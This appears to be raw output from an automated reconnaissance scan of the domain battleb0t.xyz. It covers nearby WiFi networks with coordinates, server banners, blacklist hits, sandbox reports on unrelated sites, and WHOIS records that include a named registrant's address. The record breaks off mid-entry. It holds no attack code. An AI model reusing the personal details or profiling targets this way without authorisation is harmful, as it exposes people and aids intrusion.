3C:22:70:0D:03:02:21:00:8B:39:10:8E:8A:36:DF:3F:
E7:32:3D:76:7C:AB:60:E8:18:70:D5:6D:0E:33:7A:97:
F4:0A:88:2E:3A:2E:C4:71
Signature Algorithm: sha256WithRSAEncryption
7c:6a:76:1d:db:1c:de:c2:19:6d:98:57:99:25:b4:5e:0f:bf:
95:8c:45:a2:25:ed:32:95:f2:0a:78:4e:ff:62:f4:67:48:31:
90:2b:e2:3c:d5:1d:db:e1:60:6a:0f:17:23:34:71:35:8b:95:
4d:73:cd:e3:a3:52:97:93:84:37:a2:ed:c5:7c:91:2b:0a:f9:
83:c1:eb:81:7e:88:34:cd:f0:88:f8:df:18:16:ef:ca:7e:49:
f2:a7:b7:0e:a3:4b:4e:4f:92:f3:51:0f:2b:4e:c0:52:1c:18:
2a:c7:b7:9d:09:65:0e:50:64:7a:7d:02:f3:86:ed:28:2c:cd:
4a:55:5f:32:f3:f6:3f:13:34:34:14:d8:2b:1d:6d:73:a0:41:
90:ec:31:52:17:e6:2f:8b:58:c6:fb:86:38:bb:08:6b:2a:fc:
64:0a:2b:2e:0f:f6:06:a5:76:85:8b:81:7c:0b:e7:7d:41:98:
29:67:65:9c:a3:5e:54:d7:42:a2:ca:57:e3:ed:40:b5:6b:e7:
20:ae:3b:11:70:76:c2:da:cf:31:f0:ab:ca:10:28:73:4e:36:
4a:79:71:99:ba:fe:41:29:e0:de:27:f3:42:87:08:d7:24:fe:
2c:3e:d4:01:c9:17:cd:e7:bc:a6:c4:72:63:d4:a6:ab:14:ea:
33:96:20:50
| battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | KKR Guest (Net ID: 00:01:21:70:65:31) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | sohqwn1 (Net ID: 00:16:B6:F7:22:6E) | 32.8608, -79.9746 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5ad9968f0b1cf4-ORD
| 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | steemit (Category: social)
https://steemit.com/@login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | tla60e06 (Net ID: 00:25:F0:A6:0E:06) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:AB:1C) | 50.1188, 8.6843 |
| 2023-05-12 02:44:17 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_1.jpeg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.151): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_2.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:54:07 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c529effee343669-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.114): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub Category | battleb0t.github.io |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1 375 East 2nd St Ch.11 (Net ID: 00:02:2D:8E:C5:7C) | 34.0544, -118.244 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01-scripts.github.io | 185.199.111.153 |
| 2023-05-12 02:53:30 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://t.length/4*3;t.substr(-2', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://this.drawingarea/2,math.max(e,n,r,i', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://kpmgvancouver.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a7c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_a7c_IESQMMUTEX_0_519"\n "IsoScope_a7c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2684"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a7c_IESQMMUTEX_0_303"\n "IsoScope_a7c_IE_EarlyTabStart_0x95c_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a7c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_a7c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:80"\n "185.199.109.153:443"\n "65.8.158.24:443"\n "142.251.46.234:443"\n "142.251.46.195:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kpmgvancouver.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"embed.typeform.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "kpmgvancouver.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBC90.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBC90.tmp]- [targetUID: 00000000-00003428]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003428]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo-blue_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpkpmgvancouver.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "index-53bc3cd4_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "TarBC91.tmp" has type "data"- Location: [%TEMP%\\TarBC91.tmp]- [targetUID: 00000000-00003428]\n "memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0C4k_1_.woff" has type "Web Open Font Format TrueType length 70856 version 1.1"- [targetUID: N/A]\n "memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1y4k_1_.woff" has type "Web Open Font Format TrueType length 70724 version 1.1"- [targetUID: N/A]\n "CabBC90.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBC90.tmp]- [targetUID: 00000000-00003428]\n "embed_2_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "polyfills-legacy-3885cd1a_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002684]\n "index-9c6d6def_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF46942CD6BDFF4DA1.TMP" has type "data"- Location: [%TEMP%\\~DF46942CD6BDFF4DA1.TMP]- [targetUID: 00000000-00002684]\n "~DF11BB896A60D4C13F.TMP" has type "data"- Location: [%TEMP%\\~DF11BB896A60D4C13F.TMP]- [targetUID: 00000000-00002684]\n "~DF5CCB270BF65728C8.TMP" has type "data"- Location: [%TEMP%\\~DF5CCB270BF65728C8.TMP]- [targetUID: 00000000-00002684]\n "~DF6E57F7925FF822CD.TMP" has type "data"- Location: [%TEMP%\\~DF6E57F7925FF822CD.TMP]- [targetUID: 00000000-00002684]\n "RecoveryStore._FCC6CA29-E43E-11ED-A91E-080027143435_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_0770FCD2-E43F-11ED-A91E-080027143435_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_FCC6CA2B-E43E-11ED-A91E-080027143435_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"kpmgvancouver.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://kpmgvancouver.com/"\n Pattern match: "http://kpmgvancouver.com"\n Pattern match: "SUIDMmicrosoft.com/9216108183846431029441428212564231029323*MUID0AAB32D61E88645A137620291FC4652Cmicrosoft.com/1025121432768031107795428212564231029323*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216108183846431029441428212564231029323*MUID0AAB32D61E88645A137620291FC4652Cmicrosoft.com/1025121432768031107795428212564231029323*_EDGE_V1microsoft.com/9216121432768031107795428228189231029323*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap;@importhttps://fonts.googleapis.com/css2?family=Open+Sans+Condensed:wght@300;500;600;700&display=swap;*,:before,:after{box-sizing:border-box;border-width:0;border-style:solid;b"\n Pattern match: "MUID0F4A72106BA260EB0FC460EF6A2661B3msn.com/1025122432768031107795428540689231029323*"\n Pattern match: "https://github.com/zloirock/core-js/blob/v3.30.1/LICENSE,source:https://github.com/zloirock/core-js"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "SUIDMmicrosoft.com/9216108183846431029441428212564231029323*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUIDB0AAB32D61E88645A137620291FC4652Cieonline.microsoft.com/9216121432768031107795428228189231029323*"\n Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+t,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg;casemath:returnhttp://www.w3.org/1998/Math/MathML;default:returnhttp://www.w3.org/1999/xhtml}}function"\n Pattern match: "https://37np16ihnl.execute-api.us-west-2.amazonaws.com/dev,headers:{Content-type:application/json"\n Pattern match: "https://mths.be/punycode"\n Pattern match: "https://github.com/lancedi | 185.199.109.153 |
| 2023-05-12 03:31:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@name.com | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:73) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.186): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:51:13 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://ltimindtree.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a88_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2696"\n "IsoScope_a88_IE_EarlyTabStart_0xb00_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_a88_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a88_IESQMMUTEX_0_519"\n "IsoScope_a88_ConnHashTable<2696>_HashTable_Mutex"\n "IsoScope_a88_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"52.66.101.246:80"\n "64.185.181.238:80"\n "64.185.181.238:443"\n "142.251.32.42:443"\n "185.199.108.153:443"\n "104.17.24.14:443"\n "172.217.164.99:443"\n "104.16.168.82:443"\n "216.239.38.181:443"\n "142.250.101.156:443"\n "23.55.103.51:443"\n "104.22.1.204:443"\n "13.227.74.49:443"\n "104.19.187.97:443"\n "129.148.158.16:443"\n "104.18.43.158:443"\n "142.251.46.227:443"\n "151.139.128.10:443"\n "142.250.189.226:443"\n "13.227.74.111:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ltimindtree.com"\n "www.ltimindtree.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"acsbapp.com"\n "ajax.googleapis.com"\n "analytics.google.com"\n "cdn.cookielaw.org"\n "cdn.linkedin.oribi.io"\n "cdn.mouseflow.com"\n "cdnjs.cloudflare.com"\n "fonts.gstatic.com"\n "geolocation.onetrust.com"\n "googleads.g.doubleclick.net"\n "ltimindtree.com"\n "match.adsrvr.org"\n "qmixi.github.io"\n "s1202999527.t.eloqua.com"\n "script.hotjar.com"\n "snap.licdn.com"\n "static.hotjar.com"\n "stats.g.doubleclick.net"\n "tag.demandbase.com"\n "trk.techtarget.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "43EZ227H.txt")\n file/memory contains long string with (Indicator: "dir "; File: "8GUF1RZI.txt")\n file/memory contains long string with (Indicator: "dir "; File: "T4C0O7HV.txt")\n file/memory contains long string with (Indicator: "dir "; File: "75PH84QX.txt")\n file/memory contains long string with (Indicator: "dir "; File: "QI17P0NX.txt")\n file/memory contains long string with (Indicator: "dir "; File: "3WL9D6RI.txt")\n file/memory contains long string with (Indicator: "dir "; File: "44XFFKPA.txt")\n Found string "bcookie"v=2&cb1ccd6f-b42c-4b44-8237-806d021bd94a"linkedin.com/214748467354237888031105595381518900831032152li_sugrd8484c99-a6ad-4ab5-9d4d-faddd0c36123linkedin.com/2147484673242816089631050274381518900831032152" (Indicator: "dir "; File: "8GPG8YMP.txt")\n Found string "bscookie"v=1&20230510180300fdff2656-e0a7-4700-873b-ecdcb26c3929AQFixnVDvjTyjVvSfJj7LZAE71RX5OTb"www.linkedin.com/214749286555237888031105595382097025831032152" (Indicator: "dir "; File: "7MXCO0HI.txt")\n Found string "li_sugrd8484c99-a6ad-4ab5-9d4d-faddd0c36123linkedin.com/2147484673242816089631050274381518900831032152" (Indicator: "dir "; File: "CQM0G5XR.txt")\n file/memory contains long string with (Indicator: "dir "; File: "gtm_1_.js")\n Found string "function nz(a,b){var c=this;return b}nz.K="internal.enableAutoEventOnScroll";var cc=ca(["data-gtm-yt-inspected-"]),oz=["www.youtube.com","www.youtube-nocookie.com"],pz,qz=!1;" (Indicator: "dir "; File: "gtm_1_.js")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2628.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Hero-banner-Desktop-TomTom_1_.png" has type "PNG image data 1500 x 625 8-bit/color RGB non-interlaced" and extension "png"\n "Hellenic-Bank-HB_1_.png" has type "PNG image data 1501 x 626 8-bit/color RGB non-interlaced" and extension "png"\n "Together-with-ServiceNow-EB_1_.png" has type "PNG image data 640 x 850 8-bit/color RGB non-interlaced" and extension "png"\n "sap-barcelona_1_.jpg" has type "JPEG image data JFIF standard 1.02 resolution (DPI) density 72x72 segment length 16 baseline precision 8 640x850 components 3" and extension "jpg"\n "Gradient-2_1_.png" has type "PNG image data 1050 x 1255 8-bit/color RGBA non-interlaced" and extension "png"\n "Orlando-640x850-1_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 progressive precision 8 640x850 components 3" and extension "jpg"\n "Blueprint-4D-Event-2023-EB_1_.jpg" has type "JPEG image data progressive precision 8 640x850 components 3" and extension "jpg"\n "IBM-Think-2023-EB_1_.jpg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 72x72 segment length 16 baseline precision 8 640x850 components 3" and extension "jpg"\n "Hellenic-Bank-MB_1_.png" has type "PNG image data 376 x 601 8-bit/color RGB non-interlaced" and extension "png"\n "WeAreLTIMindtree_Web-Banners_MB1a_375x600px_1_.png" has type "PNG image data 376 x 601 8-bit/color RGB non-interlaced" and extension "png"\n "community-gradient_1_.png" has type "PNG image data 1040 x 951 8-bit colormap non-interlaced" and extension "png"\n "Thumbnail-Option-2-1_1_.png" has type "PNG image data 356 x 267 